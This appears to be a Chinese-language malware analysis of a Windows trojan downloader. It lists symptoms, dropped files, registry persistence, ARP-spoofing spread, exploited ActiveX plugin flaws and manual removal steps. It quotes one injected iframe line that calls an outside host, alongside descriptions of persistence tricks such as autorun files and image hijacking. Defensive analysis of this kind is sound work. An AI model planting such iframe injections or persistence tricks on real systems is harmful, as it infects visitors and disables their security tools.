Trojan.Downloader.JKHN 病毒分析
Trojan.Downloader.JKHN 病毒分析
类型: Trojan
受影响系统:Windows 98, Windows XP, Windows Server 2003, Windows 2000
感染症状:
1、 盘符无法直接双击开,可用右键打开;
2、 部分页面无法正常打开,查看网页原文被插入如下代码
<iframe src=http://ww.xnibi.com/index.gif width=10 height=1></iframe>
3、 存在ARP 欺骗
病毒分析:
生成文件:1、用户感染后会在本地及移动设备所有盘符下生成,autorun.inf MSDOS.exe
2、在IE 目录 C:\Program Files\Internet Explorer 下生成,多个pif 病毒文件
3、替换系统自动更新文件,c:\windows\system32\wuauclt1.exe
及c:\windows\system32\dllcache\wuauclt.exe
创建启动项目:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Test 指向c:\windows\system32\wuauclt1.exe
添加映像劫持,使用部分安全工具及杀毒软件无法正常使用,当用户打开被劫持软件时直接去执行病毒文件。
传播方式:
1、 移动设备
2、 通过Arp 欺骗劫持http 数据 嵌入三方软件漏洞利用代码、进行传播。
主要利用以下三软件漏洞传播:
Flash Player 插件漏洞 (建议用户升级到)
UUSee网络电视2008 插件漏洞(UUUpgrade.ocx 3.0.2.12)
MS06-014漏洞
联众世界游戏大厅主程序GLWorld所安装的ActiveX控件漏洞。
realplayer 6.0.14 整数溢出漏洞
Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit
新浪UC DLoader Class ActiveX控件漏洞
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
MS Office Snapshot Viewer ActiveX Exploit
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本
解决办法:
手工清除办法(建议安全模式清除、清除时请不要双击)
1、 结束进程 NOTEPAD.EXE ,wuauclt1.exe
2、 以资源管理器的方式打开我的电脑,删除本地及移动设备根目录下,autorun.inf MSDOS.exe
3、 删除ie 目录下所有后缀为pif的文件,删除c:\windows\ 伪记事本文件,NOTEPAD.EXE
4、 修复被替换的系统自动更新文件c:\windows\system32\wuauclt1.exe
及c:\windows\system32\dllcache\wuauclt.exe
如在不能删除或替换,可使用 IceSword 等工具强制删除后再替换。(注:安全工具在使用前请改名)
5、 删除注册表启动项目及映像劫持
说明:
近期通过对病毒分析发现,目前利用三方软件漏洞传播的病毒十分活越,被利用的第三方ActiveX插件漏洞,涉及迅雷、暴风影音、百度超级搜霸、realplayer等多款常见软件的部分版本中,而且其中多数漏洞曾经是或者现在仍是0day漏洞。建议广大用户及时关注,常见三方软件软件漏洞更新、及时进行修复,避免感染病毒给你带来不便。
![SiS001! Board - [第一会所 关闭注册]](images/green001/logo.png){kind=logo}
